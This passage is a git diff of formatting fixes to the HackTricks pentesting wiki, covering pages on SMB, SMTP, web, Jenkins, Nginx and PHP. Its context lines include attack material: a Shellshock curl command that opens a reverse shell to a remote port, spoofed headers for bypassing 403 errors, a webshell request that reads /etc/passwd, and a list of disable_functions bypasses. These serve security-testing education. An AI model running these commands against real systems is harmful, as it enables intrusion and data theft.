@@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) While Port 139 is known technically as ‘NBT over IP’, Port 445 is ‘SMB over IP’. **SMB** stands for ‘**Server Message Blocks**’. Server Message Block in modern language is also known as **Common Internet File System**. The system operates as an application-layer network protocol primarily used for offering shared access to files, printers, serial ports, and other sorts of communications between nodes on a network. -For instance, on Windows, SMB can run directly over TCP/IP without the need for NetBIOS over TCP/IP. This will use, as you point out, port 445. On other systems, you’ll find services and applications using port 139. This means that SMB is running with NetBIOS over TCP/IP\*\*.\*\* (extracted from [here](https://www.thewindowsclub.com/smb-port-what-is-port-445-port-139-used-for)) +For instance, on Windows, SMB can run directly over TCP/IP without the need for NetBIOS over TCP/IP. This will use, as you point out, port 445. On other systems, you’ll find services and applications using port 139. This means that SMB is running with NetBIOS over TCP/IP**.** (extracted from [here](https://www.thewindowsclub.com/smb-port-what-is-port-445-port-139-used-for)) ``` 445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP) @@ -61,7 +61,7 @@ nbtscan -r 192.168.0.1/24 To look for possible exploits to the SMB version it important to know which version is being used. If this information does not appear in other used tools, you can: * Use the **MSF** auxiliary module \_**auxiliary/scanner/smb/smb\_version** -* **\*\*\_Or** this script\*\*: +* \_Or** this script**: ```bash #!/bin/sh diff --git a/pentesting/pentesting-smtp/README.md b/pentesting/pentesting-smtp/README.md index 538a906e..52d1a68a 100644 --- a/pentesting/pentesting-smtp/README.md +++ b/pentesting/pentesting-smtp/README.md @@ -255,7 +255,7 @@ A **complete guide of these countermeasures** can be found in [https://seanthege **Sender Policy Framework** (SPF) provides a mechanism that allows MTAs to check if a host sending an email is authorized.\ Then, the organisations can define a list of authorised mail servers and the MTAs can query for this lists to check if the email was spoofed or not.\ -**\*\*In order to define IP addresses/ranges, domains and others that** are allowed to send email on behalf a domain name**, different "**Mechanism\*\*" cam appear in the SPF registry. +In order to define IP addresses/ranges, domains and others that** are allowed to send email on behalf a domain name**, different "**Mechanism**" cam appear in the SPF registry. #### Mechanisms diff --git a/pentesting/pentesting-smtp/smtp-commands.md b/pentesting/pentesting-smtp/smtp-commands.md index d71fc43a..887607bd 100644 --- a/pentesting/pentesting-smtp/smtp-commands.md +++ b/pentesting/pentesting-smtp/smtp-commands.md @@ -1,6 +1,6 @@ # SMTP - Commands -**Extracted from:** [**https://serversmtp.com/smtp-commands/**](https://serversmtp.com/smtp-commands/)**** +**Extracted from:** [**https://serversmtp.com/smtp-commands/**](https://serversmtp.com/smtp-commands/) **HELO**\ It’s the first SMTP command: is starts the conversation identifying the sender server and is generally followed by its domain name. diff --git a/pentesting/pentesting-vnc.md b/pentesting/pentesting-vnc.md index b64c3144..8457f1e9 100644 --- a/pentesting/pentesting-vnc.md +++ b/pentesting/pentesting-vnc.md @@ -19,7 +19,7 @@ nmap -sV --script vnc-info,realvnc-auth-bypass,vnc-title -p msf> use auxiliary/scanner/vnc/vnc_none_auth ``` -### ****[**Brute force**](../brute-force.md#vnc) +### [**Brute force**](../brute-force.md#vnc) ## Connect to vnc using Kali diff --git a/pentesting/pentesting-web/403-and-401-bypasses.md b/pentesting/pentesting-web/403-and-401-bypasses.md index 6befe245..77f9259b 100644 --- a/pentesting/pentesting-web/403-and-401-bypasses.md +++ b/pentesting/pentesting-web/403-and-401-bypasses.md @@ -14,11 +14,11 @@ Try using **different verbs** to access the file: `GET, HEAD, POST, PUT, DELETE, * Try to [**use other User Agents**](https://github.com/danielmiessler/SecLists/blob/master/Fuzzing/User-Agents/UserAgents.fuzz.txt) to access the resource. * **Fuzz HTTP Headers**: Try using HTTP Proxy **Headers**, HTTP Authentication Basic and NTLM brute-force (with a few combinations only) and other techniques. To do all of this I have created the tool [**fuzzhttpbypass**](https://github.com/carlospolop/fuzzhttpbypass). - * `X-Originating-IP: 127.0.0.1` + * `X-Originating-IP: 127.0.0.1` * `X-Forwarded-For: 127.0.0.1` * `X-Forwarded: 127.0.0.1` * `Forwarded-For: 127.0.0.1` - * `X-Remote-IP: 127.0.0.1` + * `X-Remote-IP: 127.0.0.1` * `X-Remote-Addr: 127.0.0.1` * `X-ProxyUser-Ip: 127.0.0.1` * `X-Original-URL: 127.0.0.1` @@ -58,7 +58,7 @@ If _/path_ is blocked: * /FUZZ/secret * /secretFUZZ * **Other API bypasses:** - * /v3/users\_data/1234 --> 403 Forbidden + * /v3/users\_data/1234 --> 403 Forbidden * /v1/users\_data/1234 --> 200 OK * {“id”:111} --> 401 Unauthriozied * {“id”:\[111]} --> 200 OK diff --git a/pentesting/pentesting-web/README.md b/pentesting/pentesting-web/README.md index a9f6ccf3..b263b963 100644 --- a/pentesting/pentesting-web/README.md +++ b/pentesting/pentesting-web/README.md @@ -5,11 +5,11 @@ Do you want to have access the **latest version of Hacktricks and PEASS**, obtain a **PDF copy of Hacktricks**, and more? Discover the **brand new** [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop?frequency=one-time) **for individuals and companies.** -Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)**** +Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)**** +Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -**Join the** [**💬**](https://emojipedia.org/speech-balloon/) **** [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) **** or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** +**Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** **Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** {% endhint %} @@ -246,7 +246,7 @@ Tools: * [**Feroxbuster**](https://github.com/epi052/feroxbuster) **- Fast, supports recursive search.** * [**wfuzz**](https://github.com/xmendez/wfuzz) `wfuzz -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt https://domain.com/api/FUZZ` * [**ffuf** ](https://github.com/ffuf/ffuf)- Fast: `ffuf -c -w /usr/share/wordlists/dirb/big.txt -u http://10.10.10.10/FUZZ` -* ****[**uro**](https://github.com/s0md3v/uro) (python): This isn't a spider but a tool that given the list of found URLs will to delete "duplicated" URLs. +* [**uro**](https://github.com/s0md3v/uro) (python): This isn't a spider but a tool that given the list of found URLs will to delete "duplicated" URLs. **Recommended dictionaries:** @@ -279,7 +279,7 @@ _Note that anytime a new directory is discovered during brute-forcing or spideri * _nullenc0de “params.txt”:_ [https://gist.github.com/nullenc0de/9cb36260207924f8e1787279a05eb773](https://gist.github.com/nullenc0de/9cb36260207924f8e1787279a05eb773) * **Comments:** Check the comments of all the files, you can find **credentials** or **hidden functionality**. * If you are playing **CTF**, a "common" trick is to **hide** **information** inside comments at the **right** of the **page** (using **hundreds** of **spaces** so you don't see the data if you open the source code with the browser). Other possibility is to use **several new lines** and **hide information** in a comment at the **bottom** of the web page. -* **API keys**: If you **find any API key** there is guide that indicates how to use API keys of different platforms: [**keyhacks**](https://github.com/streaak/keyhacks)**,** [**zile**](https://github.com/xyele/zile.git)**,** [**truffleHog**](https://github.com/trufflesecurity/truffleHog)**,** [**SecretFinder**](https://github.com/m4ll0k/SecretFinder)**,** [**RegHex**](https://github.com/l4yton/RegHex\)/)**,** [**DumpsterDive**](https://github.com/securing/DumpsterDiver)**,** [**EarlyBird**](https://github.com/americanexpress/earlybird)**** +* **API keys**: If you **find any API key** there is guide that indicates how to use API keys of different platforms: [**keyhacks**](https://github.com/streaak/keyhacks)**,** [**zile**](https://github.com/xyele/zile.git)**,** [**truffleHog**](https://github.com/trufflesecurity/truffleHog)**,** [**SecretFinder**](https://github.com/m4ll0k/SecretFinder)**,** [**RegHex**](https://github.com/l4yton/RegHex\)/)**,** [**DumpsterDive**](https://github.com/securing/DumpsterDiver)**,** [**EarlyBird**](https://github.com/americanexpress/earlybird) * Google API keys: If you find any API key looking like **AIza**SyA-qLheq6xjDiEIRisP\_ujUseYLQCHUjik you can use the project [**gmapapiscanner**](https://github.com/ozguralp/gmapsapiscanner) to check which apis the key can access. * **S3 Buckets**: While spidering look if any **subdomain** or any **link** is related with some **S3 bucket**. In that case, [**check** the **permissions** of the bucket](buckets/). diff --git a/pentesting/pentesting-web/artifactory-hacking-guide.md b/pentesting/pentesting-web/artifactory-hacking-guide.md index 17ed99c9..00579c85 100644 --- a/pentesting/pentesting-web/artifactory-hacking-guide.md +++ b/pentesting/pentesting-web/artifactory-hacking-guide.md @@ -1,6 +1,6 @@ # Artifactory Hacking guide -**This content was taken from** [**https://www.errno.fr/artifactory/Attacking\_Artifactory**](https://www.errno.fr/artifactory/Attacking\_Artifactory)**** +**This content was taken from** [**https://www.errno.fr/artifactory/Attacking\_Artifactory**](https://www.errno.fr/artifactory/Attacking\_Artifactory) ## Artifactory basics diff --git a/pentesting/pentesting-web/buckets/README.md b/pentesting/pentesting-web/buckets/README.md index d36bed93..0056c72e 100644 --- a/pentesting/pentesting-web/buckets/README.md +++ b/pentesting/pentesting-web/buckets/README.md @@ -2,7 +2,7 @@ A good tool to review your configuration in several clouds is: [https://github.com/nccgroup/ScoutSuite](https://github.com/nccgroup/ScoutSuite) -****[**AWS S3 hacking tricks**](aws-s3.md)**** +[**AWS S3 hacking tricks**](aws-s3.md) **More info:** diff --git a/pentesting/pentesting-web/buckets/aws-s3.md b/pentesting/pentesting-web/buckets/aws-s3.md index 76d08805..1eef694f 100644 --- a/pentesting/pentesting-web/buckets/aws-s3.md +++ b/pentesting/pentesting-web/buckets/aws-s3.md @@ -202,7 +202,7 @@ docker inspect sha256:079aee8a89950717cdccd15b8f17c80e9bc4421a855fcdc120e1c534e4 ### Get Snapshots -Notice that _\*\*_AWS allows you to make snapshots of EC2's and databases (RDS). The main purpose for that is to make backups, but people sometimes use snapshots to get access back to their own EC2's when they forget the passwords. +Notice that _**_AWS allows you to make snapshots of EC2's and databases (RDS). The main purpose for that is to make backups, but people sometimes use snapshots to get access back to their own EC2's when they forget the passwords. Look for snapshots this user has access to (note the **SnapshotId**): @@ -261,10 +261,10 @@ If you want to read about how can you exploit meta-data in AWS [you should read {% embed url="https://github.com/tomdev/teh_s3_bucketeers" %} -\*\*\*\* + ## **List of Open Buckets** {% embed url="https://buckets.grayhatwarfare.com/" %} -\*\*\*\* + diff --git a/pentesting/pentesting-web/buckets/firebase-database.md b/pentesting/pentesting-web/buckets/firebase-database.md index aca55999..95346edc 100644 --- a/pentesting/pentesting-web/buckets/firebase-database.md +++ b/pentesting/pentesting-web/buckets/firebase-database.md @@ -69,4 +69,4 @@ You may be able to access some interesting information ## References * [https://blog.securitybreached.org/2020/02/04/exploiting-insecure-firebase-database-bugbounty/](https://blog.securitybreached.org/2020/02/04/exploiting-insecure-firebase-database-bugbounty/) -* [https://medium.com/@danangtriatmaja/firebase-database-takover-b7929bbb62e1](https://medium.com/@danangtriatmaja/firebase-database-takover-b7929bbb62e1) +* [https://medium.com/@danangtriatmaja/firebase-database-takover-b7929bbb62e1](https://medium.com/@danangtriatmaja/firebase-database-takover-b7929bbb62e1) diff --git a/pentesting/pentesting-web/cgi.md b/pentesting/pentesting-web/cgi.md index 3d63b2b7..f3d03353 100644 --- a/pentesting/pentesting-web/cgi.md +++ b/pentesting/pentesting-web/cgi.md @@ -34,7 +34,7 @@ curl -H 'User-Agent: () { :; }; /bin/bash -c "sleep 5"' http://10.11.2.12/cgi-bi curl -H 'Cookie: () { :;}; /bin/bash -i >& /dev/tcp/10.10.10.10/4242 0>&1' http://10.10.10.10/cgi-bin/user.sh ``` -\*\*\*\*[**Shellsocker**](https://github.com/liamim/shellshocker)\*\*\*\* +[**Shellsocker**](https://github.com/liamim/shellshocker) ```bash python shellshocker.py http://10.11.1.71/cgi-bin/admin.cgi diff --git a/pentesting/pentesting-web/code-review-tools.md b/pentesting/pentesting-web/code-review-tools.md index 832326f7..c7b43068 100644 --- a/pentesting/pentesting-web/code-review-tools.md +++ b/pentesting/pentesting-web/code-review-tools.md @@ -2,7 +2,7 @@ ## General -[**https://owasp.org/www-community/Source\_Code\_Analysis\_Tools**](https://owasp.org/www-community/Source_Code_Analysis_Tools#)\*\*\*\* +[**https://owasp.org/www-community/Source\_Code\_Analysis\_Tools**](https://owasp.org/www-community/Source_Code_Analysis_Tools#) ```bash https://www.sonarqube.org/downloads/ diff --git a/pentesting/pentesting-web/flask.md b/pentesting/pentesting-web/flask.md index 9e8a67db..bd0c273a 100644 --- a/pentesting/pentesting-web/flask.md +++ b/pentesting/pentesting-web/flask.md @@ -20,7 +20,7 @@ echo "ImhlbGxvIg" | base64 -d The cookie is also signed using a password -### **Flask-Unsign** +### **Flask-Unsign** Command line tool to fetch, decode, brute-force and craft session cookies of a Flask application by guessing secret keys. diff --git a/pentesting/pentesting-web/graphql.md b/pentesting/pentesting-web/graphql.md index 95e0bd7c..87cca699 100644 --- a/pentesting/pentesting-web/graphql.md +++ b/pentesting/pentesting-web/graphql.md @@ -315,9 +315,9 @@ For more information **check the** [**original post here**](https://blog.doyense ## References -* \*\*\*\*[**https://jondow.eu/practical-graphql-attack-vectors/**](https://jondow.eu/practical-graphql-attack-vectors/)\*\*\*\* -* \*\*\*\*[**https://medium.com/@the.bilal.rizwan/graphql-common-vulnerabilities-how-to-exploit-them-464f9fdce696**](https://medium.com/@the.bilal.rizwan/graphql-common-vulnerabilities-how-to-exploit-them-464f9fdce696)\*\*\*\* -* [**https://medium.com/@apkash8/graphql-vs-rest-api-model-common-security-test-cases-for-graphql-endpoints-5b723b1468b4**](https://medium.com/@apkash8/graphql-vs-rest-api-model-common-security-test-cases-for-graphql-endpoints-5b723b1468b4)\*\*\*\* -* [**http://ghostlulz.com/api-hacking-graphql/**](http://ghostlulz.com/api-hacking-graphql/)\*\*\*\* -* \*\*\*\*[**https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/GraphQL%20Injection/README.m**](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/GraphQL%20Injection/README.md)\*\*\*\* -* \*\*\*\*[**https://medium.com/@the.bilal.rizwan/graphql-common-vulnerabilities-how-to-exploit-them-464f9fdce696**](https://medium.com/@the.bilal.rizwan/graphql-common-vulnerabilities-how-to-exploit-them-464f9fdce696)\*\*\*\* +* [**https://jondow.eu/practical-graphql-attack-vectors/**](https://jondow.eu/practical-graphql-attack-vectors/) +* [**https://medium.com/@the.bilal.rizwan/graphql-common-vulnerabilities-how-to-exploit-them-464f9fdce696**](https://medium.com/@the.bilal.rizwan/graphql-common-vulnerabilities-how-to-exploit-them-464f9fdce696) +* [**https://medium.com/@apkash8/graphql-vs-rest-api-model-common-security-test-cases-for-graphql-endpoints-5b723b1468b4**](https://medium.com/@apkash8/graphql-vs-rest-api-model-common-security-test-cases-for-graphql-endpoints-5b723b1468b4) +* [**http://ghostlulz.com/api-hacking-graphql/**](http://ghostlulz.com/api-hacking-graphql/) +* [**https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/GraphQL%20Injection/README.m**](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/GraphQL%20Injection/README.md) +* [**https://medium.com/@the.bilal.rizwan/graphql-common-vulnerabilities-how-to-exploit-them-464f9fdce696**](https://medium.com/@the.bilal.rizwan/graphql-common-vulnerabilities-how-to-exploit-them-464f9fdce696) diff --git a/pentesting/pentesting-web/jboss.md b/pentesting/pentesting-web/jboss.md index e9b666c2..15a9de08 100644 --- a/pentesting/pentesting-web/jboss.md +++ b/pentesting/pentesting-web/jboss.md @@ -9,8 +9,9 @@ You can expose **management servlets** via the following paths within JBoss (dep * /web-console/Invoker (JBoss versions 6 and 7) * /invoker/JMXInvokerServlet and /invoker/EJBInvokerServlet (JBoss 5 and prior) -**You can enumerate and even exploit a JBOSS service using** [**clusterd**](https://github.com/hatRiot/clusterd)****\ -**Or using metasploit:** `msf > use auxiliary/scanner/http/jboss_vulnscan` +**You can enumerate and even exploit a JBOSS service using** [**clusterd**](https://github.com/hatRiot/clusterd)\ +**Or using metasploit:** +`msf > use auxiliary/scanner/http/jboss_vulnscan` ### Exploitation diff --git a/pentesting/pentesting-web/jenkins.md b/pentesting/pentesting-web/jenkins.md index 52d66ecc..60f5a473 100644 --- a/pentesting/pentesting-web/jenkins.md +++ b/pentesting/pentesting-web/jenkins.md @@ -23,7 +23,7 @@ You may be able to get the Jenkins version from the path _**/oops**_ or _**/erro ## Login You will be able to find Jenkins instances that **allow you to create an account and login inside of it. As simple as that.**\ -****Also if **SSO** **functionality**/**plugins** were present then you should attempt to **log-in** to the application using a test account (i.e., a test **Github/Bitbucket account**). Trick from [**here**](https://emtunc.org/blog/01/2018/research-misconfigured-jenkins-servers/). +Also if **SSO** **functionality**/**plugins** were present then you should attempt to **log-in** to the application using a test account (i.e., a test **Github/Bitbucket account**). Trick from [**here**](https://emtunc.org/blog/01/2018/research-misconfigured-jenkins-servers/). ### Bruteforce @@ -67,7 +67,7 @@ This method is very noisy because you have to create a hole new project (obvious 2. Inside **Build** section set **Execute shell** and paste a powershell Empire launcher or a meterpreter powershell (can be obtained using _unicorn_). Start the payload with _PowerShell.exe_ instead using _powershell._ 3. Click **Build now** -**** + Go to the projects and check **if you can configure any** of them (look for the "Configure button"): diff --git a/pentesting/pentesting-web/moodle.md b/pentesting/pentesting-web/moodle.md index af7d16fe..2b9bbe03 100644 --- a/pentesting/pentesting-web/moodle.md +++ b/pentesting/pentesting-web/moodle.md @@ -66,7 +66,7 @@ cmsmap http://moodle.example.com/ ### CVEs -I found that the automatic tools are pretty **useless finding vulnerabilities affecting the moodle version**. You can **check** for them in [**https://snyk.io/vuln/composer:moodle%2Fmoodle**](https://snyk.io/vuln/composer:moodle%2Fmoodle)**** +I found that the automatic tools are pretty **useless finding vulnerabilities affecting the moodle version**. You can **check** for them in [**https://snyk.io/vuln/composer:moodle%2Fmoodle**](https://snyk.io/vuln/composer:moodle%2Fmoodle) ## **RCE** diff --git a/pentesting/pentesting-web/nginx.md b/pentesting/pentesting-web/nginx.md index 47d59538..9506b087 100644 --- a/pentesting/pentesting-web/nginx.md +++ b/pentesting/pentesting-web/nginx.md @@ -1,6 +1,6 @@ # Nginx -**Most part of this page was copied from** [**https://blog.detectify.com/2020/11/10/common-nginx-misconfigurations/**](https://blog.detectify.com/2020/11/10/common-nginx-misconfigurations/)**** +**Most part of this page was copied from** [**https://blog.detectify.com/2020/11/10/common-nginx-misconfigurations/**](https://blog.detectify.com/2020/11/10/common-nginx-misconfigurations/) ## Missing root location @@ -15,7 +15,7 @@ server { } ``` -The root directive specifies the root folder for Nginx. In the above example, the root folder is `/etc/nginx` which means that we can reach files within that folder. The above configuration does not have a location for `/ (location / {...})`, only for `/hello.txt`. Because of this, the `root` directive will be globally set, meaning that requests to `/` will take you to the local path `/etc/nginx`. +The root directive specifies the root folder for Nginx. In the above example, the root folder is `/etc/nginx` which means that we can reach files within that folder. The above configuration does not have a location for `/ (location / {...})`, only for `/hello.txt`. Because of this, the `root` directive will be globally set, meaning that requests to `/` will take you to the local path `/etc/nginx`. A request as simple as `GET /nginx.conf` would reveal the contents of the Nginx configuration file stored in `/etc/nginx/nginx.conf`. If the root is set to `/etc`, a `GET` request to `/nginx/nginx.conf` would reveal the configuration file. In some cases it is possible to reach other configuration files, access-logs and even encrypted credentials for HTTP basic authentication. @@ -79,7 +79,7 @@ With a configuration such as the following: } ``` -The main issue will be that Nginx will send any URL to the PHP interpreter ending in `.php` even if the file doesn’t exist on disc. This is a common mistake in many Nginx configurations, as outlined in the “[Pitfalls and Common Mistakes](https://www.nginx.com/resources/wiki/start/topics/tutorials/config\_pitfalls/#passing-uncontrolled-requests-to-php)” document created by Nginx. +The main issue will be that Nginx will send any URL to the PHP interpreter ending in `.php` even if the file doesn’t exist on disc. This is a common mistake in many Nginx configurations, as outlined in the “[Pitfalls and Common Mistakes](https://www.nginx.com/resources/wiki/start/topics/tutorials/config\_pitfalls/#passing-uncontrolled-requests-to-php)” document created by Nginx. An XSS will occur if the PHP-script tries to define a base URL based on `SCRIPT_NAME`; @@ -126,19 +126,19 @@ Learn more about the risks of CRLF injection and response splitting at [https:/ In some cases, user-supplied data can be treated as an Nginx variable. It’s unclear why this may be happening, but it’s not that uncommon or easy to test for as seen in this [H1 report](https://hackerone.com/reports/370094). If we search for the error message, we can see that it is found in the [SSI filter module](https://github.com/nginx/nginx/blob/2187586207e1465d289ae64cedc829719a048a39/src/http/modules/ngx\_http\_ssi\_filter\_module.c#L365), thus revealing that this is due to SSI. -One way to test for this is to set a referer header value: +One way to test for this is to set a referer header value: ``` $ curl -H ‘Referer: bar’ http://localhost/foo$http_referer | grep ‘foobar’ ``` -We scanned for this misconfiguration and found several instances where a user could print the value of Nginx variables. The number of found vulnerable instances has declined which could indicate that this was patched. +We scanned for this misconfiguration and found several instances where a user could print the value of Nginx variables. The number of found vulnerable instances has declined which could indicate that this was patched. ## Raw backend response reading -With Nginx’s `proxy_pass`, there’s the possibility to intercept errors and HTTP headers created by the backend. This is very useful if you want to hide internal error messages and headers so they are instead handled by Nginx. Nginx will automatically serve a custom error page if the backend answers with one. But what if Nginx does not understand that it’s an HTTP response? +With Nginx’s `proxy_pass`, there’s the possibility to intercept errors and HTTP headers created by the backend. This is very useful if you want to hide internal error messages and headers so they are instead handled by Nginx. Nginx will automatically serve a custom error page if the backend answers with one. But what if Nginx does not understand that it’s an HTTP response? -If a client sends an invalid HTTP request to Nginx, that request will be forwarded as-is to the backend, and the backend will answer with its raw content. Then, Nginx won’t understand the invalid HTTP response and just forward it to the client. Imagine a uWSGI application like this: +If a client sends an invalid HTTP request to Nginx, that request will be forwarded as-is to the backend, and the backend will answer with its raw content. Then, Nginx won’t understand the invalid HTTP response and just forward it to the client. Imagine a uWSGI application like this: ``` def application(environ, start_response): @@ -147,7 +147,7 @@ def application(environ, start_response): return [b"Secret info, should not be visible!"] ``` -And with the following directives in Nginx: +And with the following directives in Nginx: ``` http { @@ -159,7 +159,7 @@ http { [proxy\_intercept\_errors](http://nginx.org/en/docs/http/ngx\_http\_proxy\_module.html#proxy\_intercept\_errors) will serve a custom response if the backend has a response status greater than 300. In our uWSGI application above, we will send a `500 Error` which would be intercepted by Nginx. -[proxy\_hide\_header](http://nginx.org/en/docs/http/ngx\_http\_proxy\_module.html#proxy\_hide\_header) is pretty much self explanatory; it will hide any specified HTTP header from the client. +[proxy\_hide\_header](http://nginx.org/en/docs/http/ngx\_http\_proxy\_module.html#proxy\_hide\_header) is pretty much self explanatory; it will hide any specified HTTP header from the client. If we send a normal `GET` request, Nginx will return: @@ -193,7 +193,7 @@ Secret info, should not be visible! The [merge\_slashes](http://nginx.org/en/docs/http/ngx\_http\_core\_module.html#merge\_slashes) directive is set to “on” by default which is a mechanism to compress two or more forward slashes into one, so `///` would become `/`. If Nginx is used as a reverse-proxy and the application that’s being proxied is vulnerable to local file inclusion, using extra slashes in the request could leave room for exploit it. This is described in detail by [Danny Robinson and Rotem Bar](https://medium.com/appsflyer/nginx-may-be-protecting-your-applications-from-traversal-attacks-without-you-even-knowing-b08f882fd43d). -We found 33 Nginx configuration files with `merge_slashes` set to “off”. +We found 33 Nginx configuration files with `merge_slashes` set to “off”. ## Try it yourself diff --git a/pentesting/pentesting-web/php-tricks-esp/README.md b/pentesting/pentesting-web/php-tricks-esp/README.md index 74b587bc..9db9e8c1 100644 --- a/pentesting/pentesting-web/php-tricks-esp/README.md +++ b/pentesting/pentesting-web/php-tricks-esp/README.md @@ -133,7 +133,7 @@ $obfs += ""; //int 7 ## More tricks -* **register\_globals**: In **PHP < 4.1.1.1** or if misconfigured, **register\_globals** may be active (or their behavior is being mimicked). This implies that in global variables like $\_GET if they have a value e.g. $\_GET\["param"]="1234", you can access it via **$param. Therefore, by sending HTTP parameters you can overwrite variables** that are used within the code. +* **register\_globals**: In **PHP < 4.1.1.1** or if misconfigured, **register\_globals** may be active (or their behavior is being mimicked). This implies that in global variables like $\_GET if they have a value e.g. $\_GET\["param"]="1234", you can access it via **$param. Therefore, by sending HTTP parameters you can overwrite variables** that are used within the code. * The **PHPSESSION cookies of the same domain are stored in the same place**, therefore if within a domain **different cookies are used in different paths** you can make that a path **accesses the cookie of the path** setting the value of the other path cookie.\ This way if **both paths access a variable with the same name** you can make the **value of that variable in path1 apply to path2**. And then path2 will take as valid the variables of path1 (by giving the cookie the name that corresponds to it in path2). * When you have the **usernames** of the users of the machine. Check the address: **/\~\** to see if the php directories are activated. diff --git a/pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/README.md b/pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/README.md index 9e27b833..2d2ba8da 100644 --- a/pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/README.md +++ b/pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/README.md @@ -494,13 +494,13 @@ Also note the **commented line 324**, you can uncomment it and the **payload wil Just access `http://vulnerable.com:1337/l.php?cmd=echo file_get_contents('/etc/passwd');` to get the content of the `/etc/passwd` file. {% hint style="warning" %} -You may be thinking that just in the same way we have overwritten `open_basedir` configuration we can **overwrite `disable_functions`**. Well, try it, but it won't work, apparently **`disable_functions` can only be configured in a `.ini` php** configuration file and the changes you perform using PHP\_VALUE won't be effective on this specific setting. +You may be thinking that just in the same way we have overwritten `open_basedir` configuration we can **overwrite `disable_functions`**. Well, try it, but it won't work, apparently **`disable_functions` can only be configured in a `.ini` php** configuration file and the changes you perform using PHP\_VALUE won't be effective on this specific setting. {% endhint %} ## disable\_functions Bypass If you manage have PHP code executing inside a machine you probably want to go to the next level and **execute arbitrary system commands**. In this situation is usual to discover that most or all the PHP **functions** that allow to **execute system commands have been disabled** in **`disable_functions`.**\ -****So, lets see how you can bypass this restriction (if you can) +So, lets see how you can bypass this restriction (if you can) ### Automatic bypass discovery @@ -578,7 +578,7 @@ I have created a webshell that makes very easy to perform this actions (note tha There are several ways to bypass disable\_functions if some specific module is being used or exploit some specific PHP version: -* ****[**This exploit**](https://github.com/mm0r1/exploits/tree/master/php-filter-bypass)**** +* [**This exploit**](https://github.com/mm0r1/exploits/tree/master/php-filter-bypass) * 5.\* - exploitable with minor changes to the PoC * 7.0 - all versions to date * 7.1 - all versions to date @@ -586,21 +586,21 @@ There are several ways to bypass disable\_functions if some specific module is b * 7.3 - all versions to date * 7.4 - all versions to date * 8.0 - all versions to date -* ****[**From 7.0 to 8.0 exploit (Unix only)**](https://github.com/mm0r1/exploits/blob/master/php-filter-bypass/exploit.php)**** -* [**FastCGI/PHP-FPM (FastCGI Process Manager)**](disable\_functions-bypass-php-fpm-fastcgi.md)**** +* [**From 7.0 to 8.0 exploit (Unix only)**](https://github.com/mm0r1/exploits/blob/master/php-filter-bypass/exploit.php) +* [**FastCGI/PHP-FPM (FastCGI Process Manager)**](disable\_functions-bypass-php-fpm-fastcgi.md) * **dl function** -* ****[**PHP 7.0=7.4 (\*nix)**](disable\_functions-bypass-php-7.0-7.4-nix-only.md#php-7-0-7-4-nix-only)**** -* ****[**Imagick 3.3.0 PHP >= 5.4**](disable\_functions-bypass-imagick-less-than-3.3.0-php-greater-than-5.4-exploit.md)**** -* [**PHP 5.x Shellsock**](disable\_functions-php-5.x-shellshock-exploit.md)**** -* ****[**PHP 5.2.4 ionCube**](disable\_functions-php-5.2.4-ioncube-extension-exploit.md)**** -* ****[**PHP <= 5.2.9 Windows**](disable\_functions-bypass-php-less-than-5.2.9-on-windows.md)**** -* ****[**PHP 5.2.4/5.2.5 cURL**](disable\_functions-bypass-php-5.2.4-and-5.2.5-php-curl.md)**** -* ****[**PHP Perl Extension Safe\_mode**](disable\_functions-bypass-php-perl-extension-safe\_mode-bypass-exploit.md)**** -* ****[**PHP 5.2.3 -Win32std**](disable\_functions-bypass-php-5.2.3-win32std-ext-protections-bypass.md)**** -* ****[**PHP 5.2 FOpen exploit**](disable\_functions-bypass-php-5.2-fopen-exploit.md)**** -* ****[**Bypass via mem**](disable\_functions-bypass-via-mem.md)**** -* ****[**mod\_cgi**](disable\_functions-bypass-mod\_cgi.md)**** -* ****[**PHP 4 >= 4.2.-, PHP 5 pcntl\_exec**](disable\_functions-bypass-php-4-greater-than-4.2.0-php-5-pcntl\_exec.md)**** +* [**PHP 7.0=7.4 (\*nix)**](disable\_functions-bypass-php-7.0-7.4-nix-only.md#php-7-0-7-4-nix-only) +* [**Imagick 3.3.0 PHP >= 5.4**](disable\_functions-bypass-imagick-less-than-3.3.0-php-greater-than-5.4-exploit.md) +* [**PHP 5.x Shellsock**](disable\_functions-php-5.x-shellshock-exploit.md) +* [**PHP 5.2.4 ionCube**](disable\_functions-php-5.2.4-ioncube-extension-exploit.md) +* [**PHP <= 5.2.9 Windows**](disable\_functions-bypass-php-less-than-5.2.9-on-windows.md) +* [**PHP 5.2.4/5.2.5 cURL**](disable\_functions-bypass-php-5.2.4-and-5.2.5-php-curl.md) +* [**PHP Perl Extension Safe\_mode**](disable\_functions-bypass-php-perl-extension-safe\_mode-bypass-exploit.md) +* [**PHP 